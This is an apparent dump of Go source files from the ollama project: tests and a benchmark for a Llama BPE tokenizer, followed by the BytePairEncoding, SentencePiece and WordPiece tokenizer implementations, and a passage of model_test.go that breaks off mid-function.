		"(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}{1,3}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+",
	)
}

// TestLlama exercises the BPE tokenizer end to end: exact ids, repeated-digit
// merging, roundtrips, special-token handling, pretokenizer splitting, and
// byte-level roundtrips for every single-byte rune.
func TestLlama(t *testing.T) {
	tokenizer := llama(t)

	t.Run("simple", func(t *testing.T) {
		t.Parallel()

		ids, err := tokenizer.Encode("hello world", true)
		if err != nil {
			t.Error(err)
		}

		if diff := cmp.Diff([]int32{15339, 1917}, ids); diff != "" {
			t.Errorf("no match (-theirs +ours):\n%s", diff)
		}

		s, err := tokenizer.Decode([]int32{15339, 1917})
		if err != nil {
			t.Fatal(err)
		}

		if s != "hello world" {
			t.Errorf("got %q, want hello world", s)
		}

		ids, err = tokenizer.Encode("hello <|end_of_text|>", true)
		if err != nil {
			t.Error(err)
		}

		if diff := cmp.Diff([]int32{15339, 220, 128001}, ids); diff != "" {
			t.Errorf("no match (-theirs +ours):\n%s", diff)
		}
	})

	t.Run("simple repeated", func(t *testing.T) {
		t.Parallel()

		// Digit runs merge in groups of three ("000" = 931, "00" = 410,
		// "0" = 15), so each length has a distinct expected encoding.
		cases := map[string][]int32{
			strings.Repeat("0", 1):  {15},
			strings.Repeat("0", 2):  {410},
			strings.Repeat("0", 3):  {931},
			strings.Repeat("0", 4):  {931, 15},
			strings.Repeat("0", 5):  {931, 410},
			strings.Repeat("0", 6):  {931, 931},
			strings.Repeat("0", 7):  {931, 931, 15},
			strings.Repeat("0", 8):  {931, 931, 410},
			strings.Repeat("0", 9):  {931, 931, 931},
			strings.Repeat("0", 10): {931, 931, 931, 15},
			strings.Repeat("0", 11): {931, 931, 931, 410},
			strings.Repeat("0", 12): {931, 931, 931, 931},
			strings.Repeat("0", 13): {931, 931, 931, 931, 15},
			strings.Repeat("0", 14): {931, 931, 931, 931, 410},
			strings.Repeat("0", 15): {931, 931, 931, 931, 931},
			strings.Repeat("0", 16): {931, 931, 931, 931, 931, 15},
			strings.Repeat("0", 17): {931, 931, 931, 931, 931, 410},
		}

		for s, want := range cases {
			ids, err := tokenizer.Encode(s, true)
			if err != nil {
				t.Error(err)
			}

			if diff := cmp.Diff(want, ids); diff != "" {
				t.Errorf("%q no match (-theirs +ours):\n%s", s, diff)
			}
		}
	})

	t.Run("basic roundtrip", func(t *testing.T) {
		t.Parallel()

		cases := []string{
			"hello",
			"hello ",
			"hello  ",
			" hello",
			" hello ",
			" hello  ",
			"hello world",
			"请考试我的软件!12345",
		}

		for _, want := range cases {
			ids, err := tokenizer.Encode(want, true)
			if err != nil {
				t.Error(err)
			}

			if got, err := tokenizer.Decode(ids); err != nil {
				t.Fatal(err)
			} else if got != want {
				t.Errorf("got %q, want %q", got, want)
			}
		}
	})

	t.Run("special", func(t *testing.T) {
		t.Parallel()

		cases := map[string][]int32{
			"<|begin_of_text|>A B!":                                {128000, 32, 426, 0},
			"<|begin_of_text|>A<|end_of_text|>B!":                  {128000, 32, 128001, 33, 0},
			"<|begin_of_text|>A<|end_of_text|>B<|begin_of_text|>!": {128000, 32, 128001, 33, 128000, 0},
			"<|begin_of_text|>A<|end_of_text|>B<|begin_of_text|>!<|end_of_text|>": {128000, 32, 128001, 33, 128000, 0, 128001},
		}

		for s, want := range cases {
			ids, err := tokenizer.Encode(s, true)
			if err != nil {
				t.Fatal(err)
			}

			if diff := cmp.Diff(want, ids); diff != "" {
				t.Errorf("no match (-theirs +ours):\n%s", diff)
			}
		}
	})

	t.Run("split", func(t *testing.T) {
		t.Parallel()

		cases := map[string][]string{
			"Hello World!":                   {"Hello", " World", "!"},
			"I'm don't won't":                {"I", "'m", " don", "'t", " won", "'t"},
			"In 2024 there are 366 days":     {"In", " ", "202", "4", " there", " are", " ", "366", " days"},
			"Hello!! ...world":               {"Hello", "!!", " ...", "world"},
			"Hello  World":                   {"Hello", " ", " World"},
			"Hello\nWorld":                   {"Hello", "\n", "World"},
			"Hello, WORLD!! How's it going?": {"Hello", ",", " WORLD", "!!", " How", "'s", " it", " going", "?"},
		}

		for s, want := range cases {
			got := slices.Collect(tokenizer.split(s))
			if diff := cmp.Diff(want, got); diff != "" {
				t.Errorf("no match (-theirs +ours):\n%s", diff)
			}
		}
	})

	t.Run("roundtriping 0x00-0xFF", func(t *testing.T) {
		t.Parallel()

		for b := 0x00; b <= 0xFF; b++ {
			input := string(rune(b))

			ids, err := tokenizer.Encode(input, false)
			if err != nil {
				t.Errorf("failed to encode rune 0x%02X: %v", b, err)
				continue
			}

			decoded, err := tokenizer.Decode(ids)
			if err != nil {
				t.Errorf("failed to decode rune 0x%02X: %v", b, err)
				continue
			}

			// NUL is the one byte that deliberately roundtrips to empty.
			if b == 0x00 {
				if len(decoded) != 0 {
					t.Errorf("Decode(Encode(0x00)) should be empty, got %v", ids)
				}
				continue
			}

			if decoded != input {
				t.Errorf("rune 0x%02X failed roundtrip: got %q, want %q", b, decoded, input)
			}
		}
	})
}

// BenchmarkBytePairEncoding measures encode/decode/split over growing
// prefixes (powers of ten) of the war-and-peace fixture.
func BenchmarkBytePairEncoding(b *testing.B) {
	tokenizer := llama(b)
	bts, err := os.ReadFile(filepath.Join("testdata", "war-and-peace.txt"))
	if err != nil {
		b.Fatal(err)
	}

	for i := range 8 {
		n := min(int(math.Pow10(i)), len(bts))
		bts := bts[:n]
		b.Run("encode"+strconv.Itoa(n), func(b *testing.B) {
			b.ResetTimer()
			for b.Loop() {
				_, err := tokenizer.Encode(string(bts), true)
				if err != nil {
					b.Fatal(err)
				}
			}
		})

		b.Run("decode"+strconv.Itoa(n), func(b *testing.B) {
			ids, err := tokenizer.Encode(string(bts), true)
			if err != nil {
				b.Fatal(err)
			}

			b.ResetTimer()
			for b.Loop() {
				_, err := tokenizer.Decode(ids)
				if err != nil {
					b.Fatal(err)
				}
			}
		})

		b.Run("split"+strconv.Itoa(n), func(b *testing.B) {
			b.ResetTimer()
			for b.Loop() {
				slices.Collect(tokenizer.split(string(bts)))
			}
		})
	}
}

// TestSplit verifies alternative pretokenizer patterns against the default,
// covering unicode ranges and digit-at-a-time splitting.
func TestSplit(t *testing.T) {
	cases := []struct {
		name           string
		patterns, want []string
	}{
		{
			name: "default",
			want: []string{"Hello", ",", " WORLD", "!!", " How", "'s", " it", " going", "?", " 123", " 一二三"},
		},
		{
			name: "unicode",
			patterns: []string{
				"\\p{N}{1,3}",
				`[一-龥぀-ゟ゠-ヿ]+`,
				"[!\"#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_`{|}~][A-Za-z]+|[^\r\n\\p{L}\\p{P}\\p{S}]?[\\p{L}\\p{M}]+| ?[\\p{P}\\p{S}]+[\r\n]*|\\s*[\r\n]+|\\s+(?!\\S)|\\s+",
			},
			want: []string{"Hello", ",", " WORLD", "!!", " How", "'s", " it", " going", "?", " ", "123", " ", "一二三"},
		},
		{
			name: "individual digits",
			patterns: []string{
				"(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+",
			},
			want: []string{"Hello", ",", " WORLD", "!!", " How", "'s", " it", " going", "?", " ", "1", "2", "3", " 一二三"},
		},
	}

	for _, tt := range cases {
		t.Run(tt.name, func(t *testing.T) {
			tokenizer := NewBytePairEncoding(nil, tt.patterns...)
			if diff := cmp.Diff(tt.want, slices.Collect(tokenizer.split("Hello, WORLD!! How's it going? 123 一二三"))); diff != "" {
				t.Errorf("no match (-theirs +ours):\n%s", diff)
			}
		})
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/bytepairencoding.go
model/bytepairencoding.go
package model

import (
	"cmp"
	"iter"
	"slices"
	"strings"

	"github.com/dlclark/regexp2"
	heap "github.com/emirpasic/gods/v2/trees/binaryheap"

	"github.com/ollama/ollama/logutil"
)

// BytePairEncoding is a byte-level BPE tokenizer: text is pre-split by one or
// more regexps, each split is remapped byte-by-byte into printable runes, and
// adjacent runes are then merged greedily by vocabulary merge rank.
type BytePairEncoding struct {
	vocab   *Vocabulary       // token values, merge ranks, and special tokens
	regexps []*regexp2.Regexp // compiled pre-tokenizer patterns, applied in order
}

// compile-time check that BytePairEncoding satisfies TextProcessor.
var _ TextProcessor = (*BytePairEncoding)(nil)

// NewBytePairEncoding builds a tokenizer over vocab. Each pretokenizer is a
// regexp2 pattern (compiled with RE2 semantics); when none are given, the
// HuggingFace byte-level default is used. Invalid patterns panic via
// regexp2.MustCompile, so patterns are expected to come from trusted model
// metadata.
func NewBytePairEncoding(vocab *Vocabulary, pretokenizers ...string) BytePairEncoding {
	if len(pretokenizers) == 0 {
		// set default byte-level pretokenizer if none provided, e.g.
		// https://github.com/huggingface/tokenizers/blob/main/tokenizers/src/pre_tokenizers/byte_level.rs#L44
		pretokenizers = []string{`'s|'t|'re|'ve|'m|'ll|'d| ?\p{L}+| ?\p{N}+| ?[^\s\p{L}\p{N}]+|\s+(?!\S)|\s+`}
	}
	return BytePairEncoding{
		vocab: vocab,
		regexps: slices.Collect(func(yield func(*regexp2.Regexp) bool) {
			for _, p := range pretokenizers {
				if !yield(regexp2.MustCompile(p, regexp2.RE2)) {
					return
				}
			}
		}),
	}
}

// Vocabulary implements TextProcessor.
func (bpe BytePairEncoding) Vocabulary() *Vocabulary {
	return bpe.vocab
}

// Is implements TextProcessor; it reports whether id is the given special token.
func (bpe BytePairEncoding) Is(id int32, special Special) bool {
	return bpe.vocab.Is(id, special)
}

// split runs every pre-tokenizer regexp over s in sequence; the output parts
// of one pass are the inputs of the next. Match and non-match regions are both
// yielded so that concatenating the results reproduces s.
func (bpe *BytePairEncoding) split(s string) iter.Seq[string] {
	parts := []string{s}
	for _, re := range bpe.regexps {
		parts = slices.Collect(func(yield func(string) bool) {
			for _, part := range parts {
				// regexp2 matches on runes, so index arithmetic below is in runes
				r := []rune(part)
				var offset int
				for m, _ := re.FindRunesMatch(r); m != nil; m, _ = re.FindNextMatch(m) {
					if offset-m.Index != 0 {
						// NOTE(review): this yields r[:m.Index], not r[offset:m.Index].
						// That is only correct when the sole unmatched region precedes
						// the first match (offset == 0); a gap after a later match would
						// re-emit already-yielded text — presumably the patterns used
						// never leave such gaps. TODO: confirm.
						if !yield(string(r[:m.Index])) {
							return
						}
					}
					if !yield(m.String()) {
						return
					}
					offset = m.Index + m.Length
				}
				// trailing unmatched tail, if any
				if offset < len(r) {
					if !yield(string(r[offset:])) {
						return
					}
				}
			}
		})
	}
	return slices.Values(parts)
}

// fragment is a string fragment and their corresponding token IDs
type fragment struct {
	value string
	ids   []int32 // non-empty once the fragment is resolved (e.g. a special token)
}

// pair is a pair of runes and its rank
type pair struct {
	a, b  int    // indices into the merges slice
	rank  int    // merge priority; lower merges first
	value string // concatenated text at push time, used to detect stale heap entries
}

// merge is a node in an in-place doubly linked list over the runes of a split:
// p/n are the previous/next live node indices; runes is nil once merged away.
type merge struct {
	p, n  int
	runes []rune
}

// Encode implements TextProcessor. It carves out special tokens first, then
// for each pre-tokenized split performs byte-to-rune remapping followed by
// rank-ordered BPE merges, returning the resulting token ids. When addSpecial
// is true, BOS/EOS markers are added per the vocabulary configuration.
func (bpe BytePairEncoding) Encode(s string, addSpecial bool) ([]int32, error) {
	// Pass 1: split the input around special tokens so they are emitted
	// verbatim and never participate in BPE merging.
	fragments := []fragment{{value: s}}
	for _, special := range bpe.vocab.SpecialVocabulary() {
		// TODO: process special tokens concurrently
		id := bpe.vocab.Encode(special)
		for i := 0; i < len(fragments); i++ {
			frag := fragments[i]
			if len(frag.ids) > 0 {
				continue
			}
			var middle []fragment
			// the switch shadows i with the index of special inside frag.value;
			// the outer loop index is only used again in the append below
			switch i := strings.Index(frag.value, special); {
			case i < 0:
				middle = append(middle, frag)
			case i > 0:
				middle = append(middle, fragment{value: frag.value[:i]})
				fallthrough
			default:
				middle = append(middle, fragment{value: special, ids: []int32{id}})
				if rest := frag.value[i+len(special):]; rest != "" {
					middle = append(middle, fragment{value: rest})
				}
			}
			// splice the replacement fragments over position i; the loop then
			// re-examines them (the special fragment is skipped via len(ids) > 0)
			fragments = append(fragments[:i], append(middle, fragments[i+1:]...)...)
		}
	}
	var ids []int32
	for _, frag := range fragments {
		if len(frag.ids) > 0 {
			// already-resolved special token
			ids = append(ids, frag.ids...)
			continue
		}
		for split := range bpe.split(frag.value) {
			// TODO: process splits concurrently
			// Remap each raw byte to the printable rune used by byte-level BPE
			// vocabularies (cf. the HF byte_level pretokenizer referenced above);
			// Decode applies the exact inverse mapping.
			var sb strings.Builder
			for _, b := range []byte(split) {
				r := rune(b)
				switch {
				case r == 0x00ad: // soft hyphen gets its own slot
					r = 0x0143
				case r <= 0x0020: // control chars and space shift up by 0x100
					r = r + 0x0100
				case r >= 0x007f && r <= 0x00a0: // DEL..NBSP shift up by 0xa2
					r = r + 0x00a2
				}
				sb.WriteRune(r)
			}
			// short circuit if the fragment is in the vocabulary
			if id := bpe.vocab.Encode(sb.String()); id >= 0 {
				ids = append(ids, id)
				continue
			}
			// Seed the merge list: one node per rune, linked to its neighbors.
			runes := []rune(sb.String())
			merges := make([]merge, len(runes))
			for r := range runes {
				merges[r] = merge{
					p:     r - 1,
					n:     r + 1,
					runes: []rune{runes[r]},
				}
			}
			// pairwise returns the merge candidate for the nodes at a and b,
			// or nil when out of range or the pair has no merge rank.
			pairwise := func(a, b int) *pair {
				if a < 0 || b >= len(runes) {
					return nil
				}
				left, right := string(merges[a].runes), string(merges[b].runes)
				rank := bpe.vocab.Merge(left, right)
				if rank < 0 {
					return nil
				}
				return &pair{
					a:     a,
					b:     b,
					rank:  rank,
					value: left + right,
				}
			}
			// min-heap on rank: lowest-rank (highest-priority) merge pops first
			pairs := heap.NewWith(func(i, j *pair) int {
				return cmp.Compare(i.rank, j.rank)
			})
			for i := range len(runes) - 1 {
				if pair := pairwise(i, i+1); pair != nil {
					pairs.Push(pair)
				}
			}
			for !pairs.Empty() {
				pair, _ := pairs.Pop()
				left, right := merges[pair.a], merges[pair.b]
				// stale-entry check: skip if either side was merged away since
				// this pair was pushed, or its text no longer matches
				if len(left.runes) == 0 || len(right.runes) == 0 || string(left.runes)+string(right.runes) != pair.value {
					continue
				}
				// only merge into tokens that actually exist in the vocabulary
				if id := bpe.vocab.Encode(pair.value); id < 0 {
					continue
				}
				// fold the right node into the left and unlink it
				merges[pair.a].runes = append(left.runes, right.runes...)
				merges[pair.b].runes = nil
				merges[pair.a].n = right.n
				if right.n < len(merges) {
					merges[right.n].p = pair.a
				}
				// re-evaluate the merged node against both new neighbors
				if pair := pairwise(merges[pair.a].p, pair.a); pair != nil {
					pairs.Push(pair)
				}
				if pair := pairwise(pair.a, merges[pair.a].n); pair != nil {
					pairs.Push(pair)
				}
			}
			// emit surviving nodes in order
			for _, merge := range merges {
				if len(merge.runes) > 0 {
					// TODO: handle the edge case where the rune isn't in the vocabulary
					if id := bpe.vocab.Encode(string(merge.runes)); id >= 0 {
						ids = append(ids, id)
					}
				}
			}
		}
	}
	if addSpecial {
		ids = bpe.vocab.addSpecials(ids)
	}
	logutil.Trace("encoded", "string", s, "ids", ids)
	return ids, nil
}

// Decode implements TextProcessor. It inverts the byte-to-rune remapping done
// in Encode, writing raw bytes (not UTF-8-encoded runes) so that multi-byte
// sequences reassemble correctly.
func (bpe BytePairEncoding) Decode(ids []int32) (string, error) {
	var sb strings.Builder
	for _, id := range ids {
		for _, r := range bpe.vocab.Decode(id) {
			switch {
			case r == 0x0100:
				// this produces 0x00 aka NULL
				continue
			case r == 0x0143:
				r = 0x00ad
			case r > 0x0100 && r <= 0x0120:
				r = r - 0x0100
			case r > 0x0120 && r <= 0x0142:
				r = r - 0x00a2
			}
			// NOTE: not using WriteRune here because it writes the UTF-8
			// encoding of the rune which is _not_ what we want
			if err := sb.WriteByte(byte(r)); err != nil {
				return "", err
			}
		}
	}
	logutil.Trace("decoded", "string", sb.String(), "from", ids)
	return sb.String(), nil
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/sentencepiece.go
model/sentencepiece.go
package model

import (
	"container/heap"
	"fmt"
	"log/slog"
	"strconv"
	"strings"

	"github.com/ollama/ollama/logutil"
)

// spmWhitespaceSep is the metaspace rune (U+2581) SentencePiece uses in place
// of ordinary spaces inside token values.
const spmWhitespaceSep = "▁"

// SentencePiece is a score-based (unigram/BPE-style) tokenizer: candidate
// merges are chosen by vocabulary score rather than merge rank.
type SentencePiece struct {
	maxTokenLen int // longest normal/user-defined/unused token value, in bytes
	vocab       *Vocabulary
}

// compile-time check that SentencePiece satisfies TextProcessor.
var _ TextProcessor = (*SentencePiece)(nil)

// Vocabulary implements TextProcessor.
func (spm SentencePiece) Vocabulary() *Vocabulary {
	return spm.vocab
}

// NewSentencePiece builds a tokenizer over vocab, recording per-type token
// counts (trace-logged) and the maximum mergeable token length.
// NOTE(review): the trace call slices vocab.Values[:5] etc. unconditionally —
// a vocabulary with fewer than 5 entries would panic here; presumably real
// vocabularies are always larger. TODO: confirm.
func NewSentencePiece(vocab *Vocabulary) SentencePiece {
	logutil.Trace("Tokens", "num tokens", len(vocab.Values), "vals", vocab.Values[:5], "scores", vocab.Scores[:5], "types", vocab.Types[:5])
	counter := map[int]int{}
	var maxTokenLen int
	for cnt := range vocab.Types {
		switch vocab.Types[cnt] {
		case TOKEN_TYPE_NORMAL, TOKEN_TYPE_USER_DEFINED, TOKEN_TYPE_UNUSED:
			maxTokenLen = max(maxTokenLen, len(vocab.Values[cnt]))
			fallthrough // these types are counted too
		default:
			counter[int(vocab.Types[cnt])] += 1
		}
	}
	logutil.Trace("Token counts", "normal", counter[TOKEN_TYPE_NORMAL], "unknown", counter[TOKEN_TYPE_UNKNOWN], "control", counter[TOKEN_TYPE_CONTROL], "user defined", counter[TOKEN_TYPE_USER_DEFINED], "unused", counter[TOKEN_TYPE_UNUSED], "byte", counter[TOKEN_TYPE_BYTE], "max token len", maxTokenLen)
	return SentencePiece{
		maxTokenLen: maxTokenLen,
		vocab:       vocab,
	}
}

// Is implements TextProcessor; it reports whether id is the given special token.
func (spm SentencePiece) Is(id int32, special Special) bool {
	return spm.vocab.Is(id, special)
}

// Encode implements TextProcessor. Special tokens are carved out verbatim;
// the remaining text has spaces replaced by the metaspace rune and is then
// merged greedily, highest vocabulary score first. Unmergeable remainders
// fall back to <0xNN> byte tokens.
func (spm SentencePiece) Encode(s string, addSpecial bool) ([]int32, error) {
	// Pass 1: split around special tokens (same scheme as BytePairEncoding.Encode).
	fragments := []fragment{{value: s}}
	for _, special := range spm.vocab.SpecialVocabulary() {
		id := spm.vocab.Encode(special)
		for i := 0; i < len(fragments); i++ {
			frag := fragments[i]
			if len(frag.ids) > 0 {
				continue
			}
			var middle []fragment
			// the switch shadows i with the position of special inside frag.value
			switch i := strings.Index(frag.value, special); {
			case i < 0:
				middle = append(middle, frag)
			case i > 0:
				middle = append(middle, fragment{value: frag.value[:i]})
				fallthrough
			default:
				middle = append(middle, fragment{value: special, ids: []int32{id}})
				if rest := frag.value[i+len(special):]; rest != "" {
					middle = append(middle, fragment{value: rest})
				}
			}
			// splice the replacement fragments over outer index i
			fragments = append(fragments[:i], append(middle, fragments[i+1:]...)...)
		}
	}
	var ids []int32
	for _, frag := range fragments {
		if len(frag.ids) > 0 {
			ids = append(ids, frag.ids...)
			continue
		}
		text := strings.ReplaceAll(frag.value, " ", spmWhitespaceSep)
		// short circuit: the whole fragment is a single token
		if id := spm.vocab.Encode(text); id >= 0 {
			ids = append(ids, id)
			continue
		}
		q := &queue{}
		heap.Init(q)
		// Seed an in-place linked list: one node per rune.
		runes := []rune(text)
		merges := make([]merge, len(runes))
		for r := range runes {
			merges[r] = merge{
				p:     r - 1,
				n:     r + 1,
				runes: []rune{runes[r]},
			}
		}
		// pairwise returns a merge candidate for nodes a and b when their
		// concatenation is a vocabulary token, scored by that token's score.
		pairwise := func(a, b int) *candidate {
			if a < 0 || b >= len(runes) {
				return nil
			}
			left, right := string(merges[a].runes), string(merges[b].runes)
			if id := spm.vocab.Encode(left + right); id >= 0 {
				return &candidate{
					a:     a,
					b:     b,
					score: spm.vocab.Scores[id],
					size:  len(left) + len(right),
				}
			}
			return nil
		}
		for i := range len(runes) - 1 {
			if pair := pairwise(i, i+1); pair != nil {
				heap.Push(q, pair)
			}
		}
		for q.Len() > 0 {
			pair := heap.Pop(q).(*candidate)
			left, right := merges[pair.a], merges[pair.b]
			// stale-entry check: skip candidates whose nodes were merged away
			// or whose combined byte length no longer matches
			if string(left.runes) == "" || string(right.runes) == "" || len(string(left.runes))+len(string(right.runes)) != pair.size {
				continue
			}
			// fold the right node into the left and unlink it
			merges[pair.a].runes = append(left.runes, right.runes...)
			merges[pair.b].runes = nil
			merges[pair.a].n = right.n
			if right.n < len(merges) {
				merges[right.n].p = pair.a
			}
			// re-evaluate the merged node against both new neighbors
			if pair := pairwise(merges[pair.a].p, pair.a); pair != nil {
				heap.Push(q, pair)
			}
			if pair := pairwise(pair.a, merges[pair.a].n); pair != nil {
				heap.Push(q, pair)
			}
		}
		for _, merge := range merges {
			if token := string(merge.runes); token != "" {
				id := spm.vocab.Encode(token)
				if id >= 0 {
					ids = append(ids, id)
					continue
				}
				// Fallback to byte tokenization
				var result []int32
				for _, b := range []byte(token) {
					byteToken := fmt.Sprintf("<0x%02X>", b)
					unknownID := spm.vocab.Encode(byteToken)
					if unknownID >= 0 {
						result = append(result, unknownID)
					} else {
						// byte has no token either; drop it rather than fail
						slog.Debug("unknown byte token", "byte", b, "token", byteToken)
					}
				}
				ids = append(ids, result...)
			}
		}
	}
	if addSpecial {
		ids = spm.vocab.addSpecials(ids)
	}
	logutil.Trace("encoded", "string", s, "ids", ids)
	return ids, nil
}

// candidate is a scored merge of the linked-list nodes at indices a and b.
type candidate struct {
	a, b  int
	score float32
	size  int // combined byte length at push time; used to detect stale entries
}

// queue is a max-heap of candidates: higher score first, ties broken by
// leftmost position (implements container/heap.Interface).
type queue []*candidate

func (q queue) Len() int { return len(q) }

func (q queue) Less(i, j int) bool {
	return (q[i].score > q[j].score) || (q[i].score == q[j].score && q[i].a < q[j].a)
}

func (q queue) Swap(i, j int) { q[i], q[j] = q[j], q[i] }

func (q *queue) Push(x interface{}) {
	item := x.(*candidate)
	*q = append(*q, item)
}

func (q *queue) Pop() interface{} {
	old := *q
	n := len(old)
	item := old[n-1]
	*q = old[0 : n-1]
	return item
}

// Decode implements TextProcessor. Metaspace runes become spaces, and
// "<0xNN>" byte tokens are written as raw bytes so multi-byte UTF-8
// sequences split across tokens reassemble correctly downstream.
func (spm SentencePiece) Decode(ids []int32) (string, error) {
	var sb strings.Builder
	for _, id := range ids {
		data := spm.vocab.Decode(id)
		data = strings.ReplaceAll(data, spmWhitespaceSep, " ")
		// For tokenizers that use byte tokens like "<0xEA>"
		// convert them to the partial unicode character
		// so they are buffered correctly by the runner instead
		// of being sent back to the api as "<0xEA>"
		if len(data) == 6 && strings.HasPrefix(data, "<0x") && strings.HasSuffix(data, ">") {
			// data[1:5] is "0xNN"; base 0 lets ParseUint honor the 0x prefix
			byteVal, err := strconv.ParseUint(data[1:5], 0, 8)
			if err != nil {
				return "", fmt.Errorf("failed to parse hex byte: %v", err)
			}
			if err := sb.WriteByte(byte(byteVal)); err != nil {
				return "", err
			}
		} else {
			if _, err := sb.WriteString(data); err != nil {
				return "", err
			}
		}
	}
	logutil.Trace("decoded", "ids", ids, "string", sb.String())
	return sb.String(), nil
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/wordpiece.go
model/wordpiece.go
package model

import (
	"fmt"
	"iter"
	"strings"
	"unicode"

	"github.com/ollama/ollama/logutil"
)

// WordPiece is a greedy longest-match-first subword tokenizer (BERT-style).
type WordPiece struct {
	vocab     *Vocabulary
	lowercase bool // lowercase subwords before vocabulary lookup
}

// ggmlPrefix is the prefix used by GGML vocabularies to indicate word boundaries.
// this differs from original word piece which uses "##" to indicate subwords.
const ggmlPrefix = "▁"

// wordPieceReplacer undoes common detokenization artifacts when decoding,
// e.g. re-attaching punctuation and contractions to the preceding word.
var wordPieceReplacer = strings.NewReplacer(
	" .", ".",
	" ?", "?",
	" !", "!",
	" ,", ",",
	" ' ", "'",
	" n't", "n't",
	" 'm", "'m",
	" do not", " don't",
	" 's", "'s",
	" 've", "'ve",
	" 're", "'re",
)

// Decode implements TextProcessor. A space is inserted before word-initial
// pieces (ggmlPrefix) and bracketed specials like "[SEP]", then the replacer
// cleans up punctuation spacing. Returns an error for out-of-range ids.
func (wpm WordPiece) Decode(ids []int32) (string, error) {
	var sb strings.Builder
	for i, id := range ids {
		if id < 0 || int(id) >= len(wpm.vocab.Values) {
			return "", fmt.Errorf("invalid token id: %d", id)
		}
		var separator string
		piece := wpm.vocab.Values[id]
		// no separator before the very first piece or before continuation pieces
		if i > 0 && (strings.HasPrefix(piece, ggmlPrefix) || (strings.HasPrefix(piece, "[") && strings.HasSuffix(piece, "]"))) {
			separator = " "
		}
		sb.WriteString(wordPieceReplacer.Replace(separator + strings.TrimPrefix(piece, ggmlPrefix)))
	}
	return sb.String(), nil
}

// words splits a string into words, treating CJK characters as separate words.
// TODO: this is specifically for BERT and may need to be adjusted or refactored for other models.
func (wpm WordPiece) words(s string) iter.Seq[string] {
	return func(yield func(string) bool) {
		// pad CJK runes with spaces so each becomes its own field below;
		// capacity *3 covers the worst case of every rune being padded
		runes := make([]rune, 0, len(s)*3)
		for _, r := range s {
			switch {
			// CJK unified ideograph blocks (base, extensions A–F ranges, and
			// compatibility ideographs)
			case r >= 0x4E00 && r <= 0x9FFF, r >= 0x3400 && r <= 0x4DBF, r >= 0x20000 && r <= 0x2A6DF, r >= 0x2A700 && r <= 0x2B73F, r >= 0x2B740 && r <= 0x2B81F, r >= 0x2B820 && r <= 0x2CEAF, r >= 0xF900 && r <= 0xFAFF, r >= 0x2F800 && r <= 0x2FA1F:
				runes = append(runes, ' ', r, ' ')
			default:
				runes = append(runes, r)
			}
		}
		for w := range strings.FieldsFuncSeq(string(runes), unicode.IsSpace) {
			// split on but keep punctuation
			var start int
			for start < len(w) {
				end := strings.IndexFunc(w[start:], unicode.IsPunct)
				if end < 0 {
					end = len(w) - start // no punctuation left: take the rest
				} else if end == 0 {
					end = 1 // punctuation rune itself is a one-byte word
				}
				if !yield(w[start : start+end]) {
					return
				}
				start += end
			}
		}
	}
}

// Encode implements TextProcessor. Each word is tokenized greedily: the
// longest vocabulary match starting at the current position wins (the first
// piece of a word is looked up with the ggmlPrefix word-boundary marker).
// A word with any unmatchable remainder encodes as a single [UNK].
func (wpm WordPiece) Encode(s string, addSpecial bool) ([]int32, error) {
	var ids []int32
	// TODO: use [UNK] from config
	unk := wpm.vocab.Encode("[UNK]")
	for word := range wpm.words(s) {
		var start int
		var pieces []int32
		for start < len(word) {
			end := len(word)
			var piece int32
			// shrink the candidate subword until it's in the vocabulary
			for start < end {
				subword := word[start:end]
				if start == 0 {
					subword = ggmlPrefix + subword
				}
				if wpm.lowercase {
					subword = strings.ToLower(subword)
				}
				piece = wpm.vocab.Encode(subword)
				if piece >= 0 {
					break
				}
				end--
			}
			if piece < 0 {
				// Unknown token
				pieces = pieces[:0]
				break
			}
			pieces = append(pieces, piece)
			start = end
		}
		if len(pieces) > 0 {
			ids = append(ids, pieces...)
		} else {
			ids = append(ids, unk)
		}
	}
	if addSpecial {
		ids = wpm.vocab.addSpecials(ids)
	}
	logutil.Trace("encoded", "string", s, "ids", ids)
	return ids, nil
}

// Is implements TextProcessor.
func (wpm WordPiece) Is(id int32, special Special) bool {
	return wpm.vocab.Is(id, special)
}

// Vocabulary implements TextProcessor.
func (wpm WordPiece) Vocabulary() *Vocabulary {
	return wpm.vocab
}

// compile-time check that WordPiece satisfies TextProcessor.
var _ TextProcessor = (*WordPiece)(nil)

// NewWordPiece builds a WordPiece tokenizer over vocab; lowercase controls
// whether lookups are case-folded (uncased models).
func NewWordPiece(vocab *Vocabulary, lowercase bool) WordPiece {
	return WordPiece{
		vocab:     vocab,
		lowercase: lowercase,
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/model_test.go
model/model_test.go
package model

import (
	"errors"
	"reflect"
	"slices"
	"testing"

	"github.com/google/go-cmp/cmp"

	"github.com/ollama/ollama/fs"
	fsggml "github.com/ollama/ollama/fs/ggml"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/backend/ggml"
	"github.com/ollama/ollama/ml/nn"
)

// TestParseTags verifies parsing of `gguf:"..."` struct-tag values, including
// the "alt:" alternative-name option.
func TestParseTags(t *testing.T) {
	cases := []struct {
		value string
		want  Tag
	}{
		{
			value: "output",
			want: Tag{
				name: "output",
			},
		},
		{
			value: "output,alt:token_embd",
			want: Tag{
				name: "output",
				alternatives: []string{
					"token_embd",
				},
			},
		},
	}
	for _, tt := range cases {
